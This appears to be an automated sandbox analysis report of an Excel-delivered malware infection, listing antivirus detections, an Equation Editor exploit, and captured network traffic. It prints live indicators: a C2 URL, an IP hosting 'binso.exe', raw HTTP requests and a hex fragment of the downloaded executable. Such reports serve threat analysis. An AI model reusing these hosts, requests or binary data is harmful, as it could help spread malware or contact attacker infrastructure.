Source: 7.3.Odhbljup.exe.1d6cd5c.231.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf5be4.10.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01ca4.266.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318e6c.161.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d1ac.248.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf8fb8.156.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d68fdc.173.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce932c.197.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.321d44.129.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01ca4.265.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf3014.137.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d643b0.69.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cecb88.224.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d68e6c.161.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01b78.257.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfdb70.110.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfd60c.102.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3148e0.78.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4d5c.88.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.330008.214.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.330008.212.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6943c.204.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331324.242.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d5a0.7.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf96b4.182.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d620.283.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce0e80.52.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce9258.187.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d79f90.13.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.310b08.36.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64f28.97.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d4f4.267.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cecb88.223.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6c3b0.211.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6911c.56.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315e2c.140.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.314b84.84.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8e6c.162.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce43b0.70.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01b18.60.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfe368.16.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce5eec.146.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d70ed4.92.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329938.189.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf92e0.43.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce50cc.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d65eec.144.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d598.277.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315494.128.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.310b08.34.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8e6c.161.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d650cc.4.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81ef4.276.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce5eec.144.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d0199c.254.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315eec.146.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d0058c.216.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31c008.207.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01dfc.272.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31fffc.32.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81dac.269.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329a74.201.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.323ffc.86.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce5e30.138.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d652c8.113.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d444.264.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01c54.262.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31cb84.227.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7126c.98.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce0eec.1.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6cb84.229.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d74008.79.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf8fb8.159.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d69308.6.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7058c.75.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318fdc.175.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cef438.65.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318fdc.173.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d650cc.2.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cff438.208.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d734.287.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7d60c.99.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7909c.162.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce9308.6.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf058c.75.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329a1c.193.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.328008.154.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331520.48.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce0c38.38.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d00ad4.225.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31f438.67.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331774.248.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce50f4.104.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced444.263.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d648e4.74.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d79938.189.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d71414.55.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.323000.141.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81520.45.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced5a0.9.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3292e0.43.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318b08.35.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d098.245.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7d0a8.94.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8e6c.39.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d79a74.198.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.321894.8.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d74008.147.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32b840.149.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.332094.284.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.320008.71.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d098.243.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331dfc.274.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.328fb8.157.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32e610.131.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31932c.192.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d65e30.138.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d448.261.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d444.265.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64b84.85.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d650f4.105.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.321604.108.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d098.245.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d5a0.6.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce459c.33.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d70ed4.89.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d5a0.8.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6cb88.225.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce0e80.54.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318d98.155.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d80ed4.232.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329c94.204.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e368.17.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6c8e4.217.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d793d4.176.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced378.256.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d8199c.254.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d00008.214.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce932c.192.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.325be4.13.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d620.285.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfe2fc.123.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8e6c.42.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec8e0.219.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315388.120.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d68e6c.39.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d60b08.35.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.320ad4.83.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7b840.150.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4f28.96.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d4f0.273.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.332094.286.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf1894.11.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7db70.110.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329f90.15.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced098.244.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6c008.208.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf5be4.12.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32909c.163.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cecd5c.231.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf909c.163.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d73014.137.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce5e30.136.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01520.46.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.33154c.244.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31c8e4.217.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced620.285.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6914c.179.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318e6c.40.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6fb84.28.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce9f80.28.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3185dc.153.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce48e4.72.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.319308.7.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfe610.131.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d82764.16.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf19ac.114.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce932c.191.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce459c.30.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf1894.8.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64b84.84.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d0199c.253.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cecb84.227.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d0058c.218.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81c54.262.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8b08.37.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf0008.71.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318e6c.169.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318e6c.167.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32058c.75.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6911c.54.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d1ac.247.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7f438.210.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4370.24.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4d5c.89.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32e2fc.126.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d71604.106.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8e6c.167.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfb840.150.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d444.263.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced620.283.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.33199c.253.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf3ffc.87.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfd0a8.93.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce52c8.112.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4370.25.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf0ed4.91.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf1414.56.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d790f4.170.unpack Avira: Label: TR/Patched.Ren.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000003.515473783.0000000004C20000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567269073.0000000004DB0000.00000040.00000001.sdmp, vbc.exe, 00000004.00000003.514018824.0000000004AC0000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.567928489.0000000004F30000.00000040.00000001.sdmp, NAPSTAT.EXE
Source: Binary string: napstat.pdb source: vbc.exe, 00000004.00000002.563648923.0000000003CF0000.00000040.00020000.sdmp, vbc.exe, 00000004.00000003.557853611.0000000004911000.00000004.00000001.sdmp
Source: C:\Users\Public\vbc.exe Code function: 4_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 4_2_004057AC
Source: C:\Users\user\Odhbljup.exe Code function: 7_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 7_2_004057AC
Source: C:\Users\user\Odhbljup.exe Code function: 10_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 10_2_004057AC

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 13.250.31.113:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: onedrive.live.com
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 4x nop then pop ebx 12_2_00086AB7
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 13.250.31.113:80

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 87.98.234.164 80
Source: C:\Windows\explorer.exe Domain query: www.urzeczenie.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.heidecide.xyz/hno0/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /hno0/?mhcd=MR-LdRqXxT7p86&g6A06=gtNg4Bp0cFA4pVLeRD7vodntk6HewgsZ+AnpdRhteKnDm7bsVUj6fD8/RHuCSiZlcACYig== HTTP/1.1Host: www.urzeczenie.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 02 Dec 2021 18:33:47 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25Last-Modified: Thu, 02 Dec 2021 09:01:28 GMTETag: "aa600-5d2260935ec6b"Accept-Ranges: bytesContent-Length: 697856Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 9e 05 00 00 04 05 00 00 00 00 00 10 ac 05 00 00 10 00 00 00 b0 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 0b 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 0a 21 00 00 00 a0 06 00 00 66 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 06 00 6c 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 06 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 5c 9c 05 00 00 10 00 00 00 9e 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 
41 54 41 00 00 00 00 80 14 00 00 00 b0 05 00 00 16 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 a5 0d 00 00 00 d0 05 00 00 00 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 0a 21 00 00 00 e0 05 00 00 22 00 00 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 10 06 00 00 00 00 00 00 da 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 06 00 00 02 00 00 00 da 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 6c 63 00 00 00 30 06 00 00 64 00 00 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 66 04 00 00 a0 06 00 00 66 04 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0b 00 00 00 00 00 00 a6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /7009/binso.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 13.250.31.113Connection: Keep-Alive
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000004.00000002.560666906.00000000006F4000.00000004.00000020.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: EXCEL.EXE, 00000000.00000002.682149975.00000000050B0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: EXCEL.EXE, 00000000.00000002.682326034.0000000005297000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
